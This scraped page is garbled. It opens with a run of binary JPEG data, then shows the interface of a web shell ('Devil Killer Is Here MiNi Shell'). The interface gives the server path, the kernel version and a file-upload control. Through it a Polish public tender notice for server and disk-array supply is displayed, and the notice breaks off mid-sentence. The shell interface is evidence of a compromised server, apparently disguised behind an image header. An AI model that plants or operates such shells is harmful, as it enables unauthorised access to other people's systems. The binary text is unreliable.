JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240419/0029408801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa serwerów wraz z dyskami i zasilaczami </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PODKARPACKIE BIURO GEODEZJI I TERENÓW ROLNYCH W RZESZOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180634417</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lubelska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-241</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 743 3073</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pbgitr.geodezja.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.pbgitr.geodezja.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa serwerów wraz z dyskami i zasilaczami </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c47bbcaf-fe31-11ee-885b-8267c0608453</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00294088</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00054059/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Dostawa serwerów wraz z dyskami i zasilaczami</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c47bbcaf-fe31-11ee-885b-8267c0608453 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>1. składanie ofert wraz z wymaganymi załącznikami następuje za pośrednictwem platformy e-Zamówienia:<br/>https://ezamowienia.gov.pl;<br/>2. składanie pozostałych dokumentów (innych niż wskazane w pkt 1): wniosków, oświadczeń, zawiadomień oraz przekazywanie<br/>informacji odbywa się za pomocą platformy e-Zamówienia lub poczty elektronicznej: wzp@pbgitr.geodezja.pl. Komunikacja w<br/>postępowaniu za pomocą platformy e-Zamówienia odbywa się za pośrednictwem formularzy do komunikacji dostępnych w zakładce<br/>„Formularze” („Formularze do komunikacji”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na platformie e-<br/>Zamówienia, co jest niezbędne do złożenia oferty zgodnie z pkt 13. Szczegółowe informacje na temat zakładania kont podmiotów<br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie<br/>internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Przeglądanie i pobieranie<br/>publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>3. Sposób sporządzania oraz sposób przekazywania ofert, oświadczeń, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów,<br/>przekazywanych w postępowaniu, wymagania techniczne dla dokumentów elektronicznych, o których mowa w art. 3 pkt 35<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23 lipca 2014 r. w sprawie identyfikacji elektronicznej i<br/>usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylającego dyrektywę 1999/93/WE (Dz.<br/>Urz. UE L 257 z 28.08.2014, str. 73), zwanych dalej „dokumentami elektronicznymi”, zawierających oferty, oświadczenia, o których<br/>mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, przedmiotowe środki dowodowe, oraz inne informacje, oświadczenia<br/>lub dokumenty, przekazywane w postępowaniu, wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej<br/>służących do odbioru dokumentów elektronicznych - określa Rozporządzenie Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz.<br/>2452).<br/>4. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB. Zamawiający zaznacza przy tym,<br/>że maksymalny rozmiar pliku podpisanego przy użyciu podpisu zaufanego nie może przekroczyć 10 MB (wielkość pliku wynikowego<br/>– po podpisaniu), a w przypadku pliku podpisywanego przy pomocy aplikacji eDo App (służącej do składania podpisu osobistego)<br/>maksymalna wielkość pliku wynosi 5 MB.<br/>5. Zamawiający nie udostępnia interaktywnego formularza ofertowego na Platformie - należy zignorować komunikat pojawiający się<br/>przy składaniu oferty w tym zakresie. Wzór formularza oferty stanowi załącznik nr 6 Specyfikacji Warunków Zamówienia (SWZ).<br/>6. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1, składa się, pod rygorem nieważności, w formie elektronicznej<br/>(oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>7. Oferta powinna być sporządzona w języku polskim, , z zachowaniem postaci elektronicznej w formatach danych dopuszczonych<br/>odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv, .pdf, .jpg, .git, .png, .tif, .dwg, .ath, .kst, .zip, .rar, przy<br/>czym zaleca się wykorzystywanie plików w formacie .pdf.<br/>8. Postępowanie prowadzone jest w języku polskim. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne<br/>dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>9. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się oznaczeniem:<br/>PBG.WZP-3321/05/2024.<br/>10. Osobami uprawnionymi do komunikowania się z Wykonawcami są: Anna Byczek, Piotr Rurak, e-mail: wzp@pbgitr.geodezja.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej zwanym: RODO):<br/>a. Zamawiający informuje, że Administratorem danych osobowych Wykonawcy jest Podkarpackie Biuro Geodezji i Terenów Rolnych w Rzeszowie, 35- 241 Rzeszów, ul. Lubelska 4, tel. 17 743 32 92, e-mail: rodo@pbgitr.geodezja.pl.<br/>b. W sprawach związanych z przetwarzaniem danych osobowych, Wykonawca może kontaktować się bezpośrednio z Inspektorem<br/>Ochrony Danych – Panią Moniką Domino-Wolańczyk, adres e-mail: iod@pbgitr.geodezja.pl.<br/>c. Dane osobowe Wykonawcy będą przetwarzane:<br/>- w celu wypełnienia obowiązków prawnych wynikających z postępowania udzielenie zamówienia publicznego,<br/>- w celu zawarcia i realizacji umowy (w sytuacji, gdy zostanie ona zawarta z Wykonawcą).<br/>d. Podstawę prawną przetwarzania danych osobowych stanowi art. 6 ust. lit b i c RODO oraz przepisy ustawy prawo zamówień<br/>publicznych (zwaną dalej: ustawą Pzp),<br/>e. Odbiorcami danych osobowych Wykonawcy będą organy lub podmioty upoważnione do ich otrzymania na podstawie przepisów<br/>prawa.<br/>f. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, począwszy od 1 stycznia<br/>roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy. Okresy te dotyczą również Wykonawców,<br/>którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>g. Na zasadach określonych w przepisach RODO Wykonawcy przysługuje: prawo dostępu do danych, ich sprostowania lub<br/>uzupełnienia, usunięcia lub ograniczenia przetwarzania.<br/>h. Skorzystanie przez Wykonawcę z uprawnienia do sprostowania lub uzupełnienia, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą Pzp.<br/>i. Zgłoszenie żądania ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego.<br/>j. Wykonawca może wnieść skargę do organu nadzorczego, gdy Wykonawca uzna, że przetwarzanie danych osobowych jego<br/>dotyczących narusza przepisy RODO.<br/>k. Podanie danych osobowych przez Wykonawcę jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz Ogłoszenie o zamówieniu, pkt 3.15.) RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PBG.WZP-3321/05/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa na potrzeby Zamawiającego serwera wraz z zainstalowanym oprogramowaniem, macierzy dyskowej wraz z dyskami.<br/>2.	Przedmiot zamówienia zostanie dostarczony do siedziby Zamawiającego w Rzeszowie ul. Lubelska 4.<br/>3.	Dostarczony przedmiot zamówienia musi być fabrycznie nowy wyprodukowany nie wcześniej niż w 2024 roku. Nie dopuszcza się zaoferowania odnawianych, demonstracyjnych lub powystawowych urządzeń. <br/>4.	Urządzenia muszą być zakupione w oficjalnym kanale dystrybucyjnym producenta i być objęte serwisem producenta lub autoryzowanego partnera serwisowego producenta na terenie UE.<br/>5.	Zamawiający wymaga pojedynczego punktu kontaktu dla dostarczonych urządzeń, w tym także sprzedanego oprogramowania, do wykonywania zgłoszeń serwisowych.<br/>6.	Dostarczone urządzenia muszą posiadać zainstalowane najnowszą, stabilną wersję oprogramowania dostępną na stronie producenta sprzętu na dzień dostawy sprzętu.<br/>7.	Wykonawca dostarcza niezbędne kable zasilające dla urządzeń. <br/>8.	Wykonawca dostarcza niezbędne przewody do podłączenia serwera i macierzy dyskowej z siecią LAN (min. 4 patchcordy kat. 6, o długości 3m każdy).<br/>9.	Urządzenia muszą być dostarczone Zamawiającemu w oryginalnych opakowaniach fabrycznych.<br/>10.	Zamawiający wymaga konfiguracja urządzeń poprzez:<br/>1)	Na oferowanych urządzeniach musi zostać przeprowadzona aktualizacja firmware’u. <br/>2)	Na serwerze Wykonawca zainstaluje oprogramowanie do wirtualizacji (Vmware ESXi – licencję dostarczy Zamawiający).<br/>3)	Macierz Wykonawca skonfiguruje zgodnie z najlepszymi praktykami oraz przygotuje na niej przestrzeń na instalacje maszyn wirtualnych (datastore).<br/>4)	Przy wykorzystaniu zaoferowanej licencji Microsoft Wykonawca utworzy dwie nowe maszyny wirtualne z systemem Windows Server 2022 Standard. <br/>5)	Zdalne prace wdrożeniowe Wykonawca będzie prowadził w terminie uzgodnionym z informatykiem Zamawiającego (w dni robocze, w godzinach 8:00 – 15:00).<br/>6)	Podczas wdrożenia Wykonawca przeprowadzi instruktażowe szkolenie z wdrożonych systemów.<br/>11.	Wsparcie techniczne: <br/>1)	Sprzedający musi zaoferować usługę wsparcia technicznego minimum 10h pomocy technicznej do wykorzystania przez rok od zakupu, świadczonej zdalnie, dla wdrożonych rozwiązań. <br/>2)	Pomoc będzie świadczona w terminie uzgodnionym z informatykiem Zamawiającego w dni robocze, w godzinach 8:00 – 15:00.<br/>12.	Dla dostarczonych urządzeń, Wykonawca przedłoży Zamawiającemu specyfikację techniczną sprzętu wraz z opisem dostarczonych licencji. <br/>13.	Wszystkie wykonywane prace i konfiguracje muszą być wykonane zgodnie z najlepszymi praktykami producentów dostarczonych rozwiązań. <br/>14.	Urządzenia powinny być gotowe do pracy bez dodatkowych kosztów.<br/>15.	Minimalna długość gwarancji*) na dostarczone urządzenia: 36 miesięcy na miejscu u klienta z czasem rozpoczęcia naprawy na następny dzień roboczy (NBD). <br/>16. Szczegółowy opis przedmiotu zamówienia został umieszczony w załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233000-1 - Urządzenia do przechowywania i odczytu danych</p> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">37453300-1 - Dyski</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie przedstawionych poniżej kryteriów oraz ich wagi. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów (P) stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + G1 + G2<br/>gdzie:<br/>P – suma ilości uzyskanych punktów <br/>C – ilość punktów uzyskanych w kryterium „Cena (cena ofertowa brutto)” (C)<br/>G1 – ilość punktów uzyskanych w kryterium „Okres gwarancji serwera” (G1)<br/>G2 – ilość punktów uzyskanych w kryterium „Okres gwarancji macierzy dyskowej” (G2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji serwera (G1)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji macierzy dyskowej (G2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie<br/>Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1.1. Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1-4 ustawy,<br/>b) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>c) art. 108 ust. 1 pkt 6 ustawy,<br/>d) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>1.2. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 i 1705), z innym<br/>Wykonawcą, który złożył odrębną ofertę albo oświadczenie<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>1.3. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>2.1. odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o<br/>których mowa w pkt 1 ppkt 1.3 – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>3. Dokumenty, o których mowa w pkt 2 ppkt 2.1, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego 